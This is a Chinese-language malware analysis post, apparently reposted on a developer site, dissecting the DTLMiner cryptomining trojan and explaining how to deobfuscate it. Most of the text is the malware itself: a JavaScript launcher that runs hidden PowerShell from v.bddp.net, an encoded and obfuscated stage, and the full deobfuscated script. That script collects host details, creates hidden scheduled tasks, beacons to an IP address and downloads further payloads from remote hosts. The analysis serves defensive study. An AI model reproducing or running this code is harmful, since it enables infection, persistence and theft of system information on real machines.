内容简介:新版挖矿木马病毒快捷方式执行使用javascript 执行的该 javascript 代码从
新版挖矿木马病毒 DTLMiner
通过漏洞和弱口令攻击植入,创建快捷方式开机自启动
快捷方式执行使用javascript 执行的 flashplayer.tmp
文件内容如下:
try{(new ActiveXObject("WScript.Shell")).Run("powershell -w hidden -ep bypass -c while($True){try{IEX (New-Object Net.WebClient).downloadstring('http://v.bddp.net/ipc?dplow')}catch{Sleep -m 2500000}}",0,false);}catch(e){}
该 javascript 代码从 http://v.bddp.net/ipc?dplow
下载代码并使用 powershell 执行
访问链接内容如下:
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
修改以上代码中的 Invoke-Expression
为 $code =
然后
$a | Out-File decodedStream.txt
解码后的代码会写入到 decodedStream.txt
内容如下:
& ( ([StRing]$veRbOSEpREFERENCE)[1,3]+'x'-JOIN'')( ((("{50}{52}{11}{63}{13}{15}{8}{64}{17}{3}{67}{69}{6}{79}{60}{16}{49}{43}{68}{25}{33}{14}{56}{21}{76}{73}{78}{37}{9}{54}{2}{46}{19}{81}{85}{1}{48}{82}{66}{45}{23}{28}{36}{55}{77}{61}{7}{41}{71}{5}{59}{39}{40}{75}{34}{29}{57}{72}{27}{10}{38}{58}{31}{26}{62}{53}{35}{30}{84}{74}{51}{4}{70}{80}{20}{22}{32}{42}{18}{65}{44}{83}{47}{24}{0}{12}" -f 'op-Process -Force -p','8s+(Get-WmiObject -Class Win32_OperatingSystem).version+u8s&bit=u8s+(Get-WmiObject Win32_OperatingSystem).','pArdflag = pArflase New-Object System.Threading.Mut','gu8','rt-Process -FilePath cmd.exe -ArgumentList u8spAronpsu8s }else{} }catch{} try{ if([IntPtr]::Size -eq 8){ pArdglink = u8s/c powershell -nop -w','u8s8qKMic','0-00-00-00u8s }else{} [System.Thr','ArText) pArbcode = [Convert]::ToBase64S','3Obj','g = pArflase New-Object S','code.GetB','pAravs = u8su8s [string]pArmac = (getmac /FO CSVyuESelect-Object -Skip 1 -first 1yuE ConvertFrom-Csv -Header MACyuEselect-object -expand MAC) pAravs = (Get-WmiObje','rocessname powershell }else{}',' root8qKSecurityCenter2 -Class AntiVirusProduct).displayName if(pAravs.GetType().name.Index','Aren','Of(gP','Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.',' }else{ pArav = pAravs } try{ if((Get-Service zhudongfangyu yuE Sort -Property Status).Status -eq u8sRunnin','net/d32.dat?allv6u8s + pArkey + u8sgP3)u8s + gP3u8sgP3 } if(pArdflag){ ','mat gP3','else{ pArdgli','[string]pArflag = test-path pArpath pArpath2 = u8spArenv:temp8qK8qKk','nk = u8s/c powershell -nop -w hidden -ep bypas','+ pArenv:USERNAME + u8s&PS=u8s + pArpsflag if(pArflag -eq gP3FalsegP3){','type file St',' = u8','ershell -nop -ep bypass -e gP3 + pArbcode +gP3u8s /FgP3 &cmd.exe /c pArccc } }catch{} }else{} try{ pArdownload = gP3','::Uni',' New-Item pArpath -type file try{','pAr','ownloadString(u8spArdownloadu8s) }catch{} try{ if(pArpsflag){ pAronps = u8s/c powershell -nop -w hidden -ep byp','u8s /tr u8spow','s -c u8s +','sp','s + pArdt + u8sgP3)u8s ','mmand.Definition IEX (New-Object Net.WebClient).D',' if(pArpermit){ pArstatus += gP3PHigyuEgP','P3 pArpsfla','ytes(pArText) pArbcode = [Convert]::ToBase64String(pArBytes) pArccc = gP3schtasks /query /tn u8sgP3 + pArmac','P3u8s /FgP3 &cmd.exe /c pArccc }else{ pArstatus +','= gP3PLowyuEgP3 pArText','tring(pArBy',' gP3u8sgP3 + u8sIEX (New-Object Net.WebClient).downloadstring(gP3u8s + u8shttp://down.bddp.','nist',' }else{}','ser=u8s ','ex (pArtrue,pArname2,[ref]pArdflag) }catch{} pArdt = Get-Date -For','rpath2 -','OSArch','Principal.WindowsBuiltInRole] u8sAdmi','[string]pArav = u8s','/down.bddp.net/newol.dat?allv6u8s + pArkey + u8sgP3)u8s + gP3u8sgP3 Sta','u8s [string]','json?allv6gP3 + pArkey + u8s&u8s + pArstatus + u8s&u8s + pArMyInvocation.MyCo','ystem.Threading.Mutex (pArtrue,pArname,[ref]pArpsflag) }catch{} try{ pArname2 = gP3Global8qKpowerdv5gP3 ','3 pArText = u8sIEX (New-Object Net.WebClient).downloadstring(gP3http://v.y6h.net/g?hu8s + pArdt + u8sgP3)u8s pArBytes = [System.Text.Enco','v:temp8qK8qKkkk1.logu8s ','Bytes ',' + gP3u8s yuEyuE schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn u8sgP3 + pArmac + gP3','rosoft8qKwindows8qKgP3 + pArmac + gP3u8s /tr u8spowershell -nop -ep bypass -e gP3 + pArbcode +g','ermit = ([Security.','de.GetBytes(p','http://27.102.107.137/status.','ct -Namespace','ectgP3) -gt -1){ for(pArv = 0; pArv -lt pAravs.Count; pArv++){ pArav += pAravs[pArv] + u8syuEu8s } ',' Start-Process -FilePath cmd.exe -ArgumentList u8spArdglinku8s ','et-WmiObject win32_computersystem).Domain + u8s&u','s){ pArav += gP3','ratoru8s) pArstatus = gP3yuEgP3 pArpath','ZDFYgP3 } }catch{} if(-not (pArmac -match gP3^[8qKda-fA-F-]*pArgP3)){ [string]pArmac = u8s00-00-0',' hidden -ep bypass -c u8s + gP3u8sgP3 + u8sIEX (New-Object Net.WebClient)','tes) pArccc = gP3schtasks /query /tn u8s8qKMicrosoft8qKwindows8qKgP3 + pArmac + gP3u8s yuEyuE schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn ','= [System.Text.Encoding]',' [string]pArflag2 = test-path pArpath2 try{ pArname = gP3Glob','3u8sgP3 + u8sIEX (New-Object Net.WebClient).downloadstring(gP3u8s + u8shttp:/',' = u8sIEX (New-Object Net.WebClient).downloadstring(gP3http://v.y6h.net/g?lu8','ill.logu8s ','ding]::Unico','al8qKpowerv5g','eading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000)) pArp','.downloadstring(gP3u8s + u8shttp://down.bddp.net/d64.dat?allv6u8s + pArkey + u8sgP3)u8s + gP3u8sgP3 }','yyMMddgP3 ','itecture + u8s&flag2=u8s + pArflag + u8s&domain=u8s + (G',' }catch{} [System.Threading.Thread]::Sleep(3000) if(pArflag2 -eq gP3FalsegP3){ New-Item pA','ass -c u8s + gP',' pArkey = u8s&mac=u8s+pArmac+u8s&av=u8s+pArav+u8s&version=u'))-crEplaCE([cHaR]56+[cHaR]113+[cHaR]75),[cHaR]92-crEplaCE 'u8s',[cHaR]34 -crEplaCE ([cHaR]112+[cHaR]65+[cHaR]114),[cHaR]36-crEplaCE 'gP3',[cHaR]39-RePlACE 'yuE',[cHaR]124) )
去掉 &
符号,在 ( ([StRing]$veRbOSEpREFERENCE)[1,3]+'x'-JOIN'')
前添加代码 $code =
, 后面添加 +
号,新添加一行打印 Write-Host $a
即可得到反混淆后的 powershell
代码
iex[string]$av = "" [string]$avs = "" [string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC) $avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName if($avs.GetType().name.IndexOf('Object') -gt -1){ for($v = 0; $v -lt $avs.Count; $v++){ $av += $avs[$v] + "|" } }else{ $av = $avs } try{ if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){ $av += 'ZDFY' } }catch{} if(-not ($mac -match '^[\da-fA-F-]*$')){ [string]$mac = "00-00-00-00-00-00" }else{} [System.Threading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000)) $permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $status = '|' $path = "$env:temp\\kkk1.log" [string]$flag = test-path $path $path2 = "$env:temp\\kill.log" [string]$flag2 = test-path $path2 try{ $name = 'Global\powerv5' $psflag = $flase New-Object System.Threading.Mutex ($true,$name,[ref]$psflag) }catch{} try{ $name2 = 'Global\powerdv5' $dflag = $flase New-Object System.Threading.Mutex ($true,$name2,[ref]$dflag) }catch{} $dt = Get-Date -Format 'yyMMdd' $key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag if($flag -eq 'False'){ New-Item $path -type file try{ if($permit){ $status += 'PHig|' $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')" $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) $bcode = [Convert]::ToBase64String($Bytes) $ccc = 'schtasks /query /tn "\Microsoft\windows\' + $mac + '" || schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn "\Microsoft\windows\' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F' &cmd.exe /c $ccc }else{ $status += 'PLow|' $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')" $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) $bcode = [Convert]::ToBase64String($Bytes) $ccc = 'schtasks /query /tn "' + $mac + '" || schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn "' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F' &cmd.exe /c $ccc } }catch{} }else{} try{ $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition IEX (New-Object Net.WebClient).DownloadString("$download") }catch{} try{ if($psflag){ $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"' Start-Process -FilePath cmd.exe -ArgumentList "$onps" }else{} }catch{} try{ if([IntPtr]::Size -eq 8){ $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"' }else{ $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"' } if($dflag){ Start-Process -FilePath cmd.exe -ArgumentList "$dglink" }else{} }catch{} [System.Threading.Thread]::Sleep(3000) if($flag2 -eq 'False'){ New-Item $path2 -type file Stop-Process -Force -processname powershell }else{}
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。